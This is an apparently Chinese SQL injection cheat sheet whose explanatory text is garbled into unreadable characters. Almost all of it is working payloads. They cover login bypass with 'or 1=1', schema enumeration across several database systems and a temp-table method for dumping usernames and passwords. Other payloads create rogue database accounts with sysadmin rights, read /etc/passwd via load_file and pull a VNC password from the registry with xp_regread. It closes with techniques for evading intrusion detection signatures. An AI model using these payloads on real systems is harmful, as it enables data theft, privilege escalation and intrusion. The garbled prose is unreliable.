SQLע似
SQLע似תԣhttp://nb.2sb.cn/?p=54
ߣɫ
====||Ŀ¼||=====
C
1
2©
3ռϢ
4
5ץȡ
6ݿʺ
7MYSQL
8
9עVNC
10̴IDS֤
11MYSQLʹchar()ƭ
12עͶIDS֤
13ŵַ
====||¿ʼ||====
1
㿴һֻ80˿ڣһ̶˵ԱϵͳIJĺܺãҪЧĹҲӦתWEBSQLעõĹʽ㹥WENϵͳASPPHPJSPCGIȣȥϵͳϵͳҪĶࡣ
SQLעͨҳеƭʹǹIJѯ֪߱WEBкܶĵطûE_mail
2©
ʼӦôԣ
- Login: or 1=1C
- Pass: or 1=1C
- http://website/index.asp?id= or 1=1C
ķʽ
- having 1=1C
- group by userid having 1=1C
- SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename)C
- union select sum(columnname) from tablenameC
3ռϢ
- or 1 in (select @@version)C
- union all select @@versionC
ͿԵõϵͳİ汾ͲϢ
4
Oracleݿ>>
C>SYS.USER_OBJECTS (USEROBJECTS)
C>SYS.USER_VIEWS
C>SYS.USER_TABLES
C>SYS.USER_VIEWS
C>SYS.USER_TAB_COLUMNS
C>SYS.USER_CATALOG
C>SYS.USER_TRIGGERS
C>SYS.ALL_TABLES
C>SYS.TAB
MySQLݿ
C>mysql.user
C>mysql.host
C>mysql.db
MS access
C>MsysACEs
C>MsysObjects
C>MsysQueries
C>MsysRelationships
MS SQL Serverݿ
C>sysobjects
C>syscolumns
C>systypes
C>sysdatabases
5ץȡ
䡣
//ѯĽ
step1 : ; begin declare @var varchar(8000) set @var=: select @var=@var++login+/'+password+ from users where login > @var select @var as var into temp end C
//ȡϢ
step2 : and 1 in (select var from temp)C
//ɾʱ
step3 : ; drop table temp C
6ݿʺ
MS SQL
exec sp_addlogin name , password
exec sp_addsrvrolemember name , sysadmin
MySQL
INSERT INTO mysql.user (user, host, password) VALUES (name, localhost, PASSWORD(pass123))
Access
CRATE USER name IDENTIFIED BY pass123
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD pass123
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7MYSQLѯ
ʹUnionѯļ룬£
- union select 1,load_file(/etc/passwd),1,1,1;
8ϵͳ
- and 1 in (select @@servername)C
- and 1 in (select servername from master.sysservers)C
9ҵVNC루ע
ʵ£
- ; declare @out binary(8)
- exec master..xp_regread
- @rootkey = HKEY_LOCAL_MACHINE,
- @key = SOFTWARE\ORL\WinVNC3\Default,
- @value_name=password,
- @value = @out output
- select cast (@out as bigint) as x into TEMPC
- and 1 in (select cast(x as varchar) from temp)C
10ܿIDS
Evading OR 1=1 Signature
- OR unusual = unusual
- OR something = some+'thing
- OR text = Ntext
- OR something like some%
- OR 2 > 1
- OR text > t
- OR whatever in (whatever)
- OR 2 BETWEEN 1 and 3
11MYSQLʹchar()
ŵע䣬磺 (string = %):
C> or username like char(37);
ŵע䣬磺 (string=root):
C> union select * from users where login = char(114,111,111,116);
unionsʹload files 磺(string = /etc/passwd):
C> union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
ļǷڣ磺 (string = n.ext):
C> and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12עͷűܿIDS
£
C>/**/OR/**/1/**/=/**/1
C>Username: or 1/*
C>Password:*/=1C
C>UNI/**/ON SEL/**/ECT ȽϺӦôΪ
C>(Oracle) ; EXECUTE IMMEDIATE SEL || ECT US || ER
C>(MS SQL) ; EXEC (SEL + ECT US + ER)
13ŵַ
char()0X첻ŵ䡣
C> INSERT INTO Users(Login, Password, Level) VALUES( char(070) + char(065) + char(074) + char(065) + char(072) + char(070) + char(065) + char(074) + char(065) + char(072), 064)